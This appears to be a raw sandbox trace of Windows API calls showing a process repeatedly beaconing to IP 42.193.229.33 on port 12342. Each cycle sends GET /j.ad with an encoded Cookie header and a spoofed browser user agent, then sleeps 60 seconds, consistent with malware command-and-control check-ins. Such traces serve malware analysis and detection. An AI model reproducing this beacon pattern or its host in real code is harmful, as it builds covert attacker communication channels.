[0231.160] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0231.161] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0233.154] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0233.154] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0233.155] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0233.155] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0233.155] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0233.155] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0233.155] Sleep (dwMilliseconds=0xea60) [0233.169] GetLastError () returned 0x2efd [0233.169] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0233.169] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0233.169] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0233.169] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0233.170] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0233.170] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0233.170] GetLastError () returned 0x0 [0233.170] htonl (hostlong=0x7000000) returned 0x7 [0233.170] htonl (hostlong=0x0) returned 0x0 [0233.170] htonl (hostlong=0x3000000) returned 0x3 [0233.170] htonl (hostlong=0x6000000) returned 0x6 [0233.170] htonl (hostlong=0x6000000) returned 0x6 [0233.170] GetLastError () returned 0x0 [0233.170] htonl (hostlong=0x0) returned 0x0 [0233.170] GetLastError () returned 0x0 [0233.171] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0233.171] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0235.154] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0235.154] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0235.154] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0235.154] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0235.154] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0235.154] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0235.154] Sleep (dwMilliseconds=0xea60) [0235.161] GetLastError () returned 0x2efd [0235.168] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0235.169] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0235.169] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0235.169] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0235.169] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0235.169] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0235.169] GetLastError () returned 0x0 [0235.169] htonl (hostlong=0x7000000) returned 0x7 [0235.169] htonl (hostlong=0x0) returned 0x0 [0235.169] htonl (hostlong=0x3000000) returned 0x3 [0235.169] htonl (hostlong=0x6000000) returned 0x6 [0235.169] htonl (hostlong=0x6000000) returned 0x6 [0235.169] GetLastError () returned 0x0 [0235.170] htonl (hostlong=0x0) returned 0x0 [0235.170] GetLastError () returned 0x0 [0235.170] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0235.170] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0237.154] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0237.154] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0237.154] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0237.154] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0237.154] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0237.154] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0237.154] Sleep (dwMilliseconds=0xea60) [0237.159] GetLastError () returned 0x2efd [0237.159] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0237.160] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0237.160] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0237.160] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0237.160] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0237.160] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0237.160] GetLastError () returned 0x0 [0237.160] htonl (hostlong=0x7000000) returned 0x7 [0237.160] htonl (hostlong=0x0) returned 0x0 [0237.160] htonl (hostlong=0x3000000) returned 0x3 [0237.160] htonl (hostlong=0x6000000) returned 0x6 [0237.160] htonl (hostlong=0x6000000) returned 0x6 [0237.160] GetLastError () returned 0x0 [0237.160] htonl (hostlong=0x0) returned 0x0 [0237.160] GetLastError () returned 0x0 [0237.161] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0237.161] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0239.144] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0239.144] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0239.144] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0239.144] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0239.144] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0239.144] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0239.144] Sleep (dwMilliseconds=0xea60) [0239.155] GetLastError () returned 0x2efd [0239.162] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0239.163] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0239.163] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0239.163] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0239.163] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0239.163] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0239.163] GetLastError () returned 0x0 [0239.163] htonl (hostlong=0x7000000) returned 0x7 [0239.163] htonl (hostlong=0x0) returned 0x0 [0239.163] htonl (hostlong=0x3000000) returned 0x3 [0239.163] htonl (hostlong=0x6000000) returned 0x6 [0239.163] htonl (hostlong=0x6000000) returned 0x6 [0239.163] GetLastError () returned 0x0 [0239.164] htonl (hostlong=0x0) returned 0x0 [0239.164] GetLastError () returned 0x0 [0239.164] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0239.164] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0241.134] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0241.134] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0241.134] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0241.134] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0241.134] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0241.134] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0241.134] Sleep (dwMilliseconds=0xea60) [0241.136] GetLastError () returned 0x2efd [0241.136] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0241.136] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0241.136] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0241.136] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0241.136] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0241.136] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0241.136] GetLastError () returned 0x0 [0241.136] htonl (hostlong=0x7000000) returned 0x7 [0241.136] htonl (hostlong=0x0) returned 0x0 [0241.136] htonl (hostlong=0x3000000) returned 0x3 [0241.136] htonl (hostlong=0x6000000) returned 0x6 [0241.136] htonl (hostlong=0x6000000) returned 0x6 [0241.136] GetLastError () returned 0x0 [0241.136] htonl (hostlong=0x0) returned 0x0 [0241.136] GetLastError () returned 0x0 [0241.137] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0241.137] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0243.107] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0243.108] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0243.108] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0243.110] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0243.112] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0243.112] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0243.114] Sleep (dwMilliseconds=0xea60) [0243.119] GetLastError () returned 0x2efd [0243.119] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0243.119] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0243.120] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0243.120] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0243.120] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0243.120] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0243.120] GetLastError () returned 0x0 [0243.122] htonl (hostlong=0x7000000) returned 0x7 [0243.122] htonl (hostlong=0x0) returned 0x0 [0243.123] htonl (hostlong=0x3000000) returned 0x3 [0243.123] htonl (hostlong=0x6000000) returned 0x6 [0243.123] htonl (hostlong=0x6000000) returned 0x6 [0243.124] GetLastError () returned 0x0 [0243.125] htonl (hostlong=0x0) returned 0x0 [0243.125] GetLastError () returned 0x0 [0243.125] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0243.126] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0245.095] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0245.096] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0245.096] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0245.096] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0245.096] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0245.096] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0245.096] Sleep (dwMilliseconds=0xea60) [0245.098] GetLastError () returned 0x2efd [0245.098] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0245.098] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0245.098] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0245.098] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0245.098] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0245.098] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0245.098] GetLastError () returned 0x0 [0245.099] htonl (hostlong=0x7000000) returned 0x7 [0245.099] htonl (hostlong=0x0) returned 0x0 [0245.099] htonl (hostlong=0x3000000) returned 0x3 [0245.099] htonl (hostlong=0x6000000) returned 0x6 [0245.099] htonl (hostlong=0x6000000) returned 0x6 [0245.099] GetLastError () returned 0x0 [0245.099] htonl (hostlong=0x0) returned 0x0 [0245.099] GetLastError () returned 0x0 [0245.099] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0245.099] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0247.075] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0247.075] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0247.075] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0247.075] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0247.075] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0247.075] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0247.075] Sleep (dwMilliseconds=0xea60) [0247.079] GetLastError () returned 0x2efd [0247.080] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0247.085] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0247.085] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0247.086] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0247.086] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0247.086] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0247.086] GetLastError () returned 0x0 [0247.088] htonl (hostlong=0x7000000) returned 0x7 [0247.088] htonl (hostlong=0x0) returned 0x0 [0247.088] htonl (hostlong=0x3000000) returned 0x3 [0247.088] htonl (hostlong=0x6000000) returned 0x6 [0247.089] htonl (hostlong=0x6000000) returned 0x6 [0247.089] GetLastError () returned 0x0 [0247.089] htonl (hostlong=0x0) returned 0x0 [0247.089] GetLastError () returned 0x0 [0247.089] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0247.089] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0249.065] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0249.065] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0249.065] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0249.065] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0249.065] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0249.065] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0249.065] Sleep (dwMilliseconds=0xea60) [0249.076] GetLastError () returned 0x2efd [0249.082] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0249.082] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0249.082] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0249.083] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0249.083] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0249.083] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0249.083] GetLastError () returned 0x0 [0249.083] htonl (hostlong=0x7000000) returned 0x7 [0249.083] htonl (hostlong=0x0) returned 0x0 [0249.083] htonl (hostlong=0x3000000) returned 0x3 [0249.083] htonl (hostlong=0x6000000) returned 0x6 [0249.083] htonl (hostlong=0x6000000) returned 0x6 [0249.083] GetLastError () returned 0x0 [0249.083] htonl (hostlong=0x0) returned 0x0 [0249.083] GetLastError () returned 0x0 [0249.084] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0249.084] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0251.070] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0251.070] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0251.070] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0251.070] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0251.071] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0251.071] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0251.071] Sleep (dwMilliseconds=0xea60) [0251.079] GetLastError () returned 0x2efd [0251.079] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0251.080] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0251.080] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0251.080] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0251.080] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0251.080] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0251.080] GetLastError () returned 0x0 [0251.080] htonl (hostlong=0x7000000) returned 0x7 